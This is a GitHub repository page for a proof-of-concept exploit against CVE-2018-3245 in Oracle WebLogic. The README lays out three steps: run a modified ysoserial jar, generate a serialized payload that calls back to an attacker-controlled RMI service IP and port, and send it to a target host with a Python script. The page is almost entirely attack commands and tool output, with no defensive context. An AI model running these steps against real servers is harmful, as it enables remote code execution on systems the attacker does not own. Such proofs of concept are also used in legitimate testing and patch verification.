CVE-2018-3245-PoC
Switch branches/tags
Nothing to show
Clone or download
Latest commit 3f4b020 Oct 27, 2018
Permalink
Failed to load latest commit information.
README.md Update README.md Oct 27, 2018
weblogic.py Update weblogic.py Oct 27, 2018
ysoserial-cve-2018-3245.jar Add files via upload Oct 24, 2018

README.md

CVE-2018-3245

Step 1

java -jar ysoserial-cve-2018-3245.jar

WHY SO SERIAL?
Usage: java -jar ysoserial-cve-2018-3245.jar [payload] '[command]'
Available payload types:
     Payload         Authors   Dependencies
     -------         -------   ------------
     CVE_2018_2893_1 @mbechler
     CVE_2018_2893_2 @mbechler
     CVE_2018_2893_3 @mbechler
     CVE_2018_3245   @mbechler
     JRMPClient      @mbechler
     Jdk7u21         @frohoff

Step 2

java -jar ysoserial-cve-2018-3245.jar CVE_2018_3245 "[RMI_SERVICE_IP]:[PORT]" > poc5.ser

Step 3

python weblogic.py [TARGET_HOST] [PORT] poc5.ser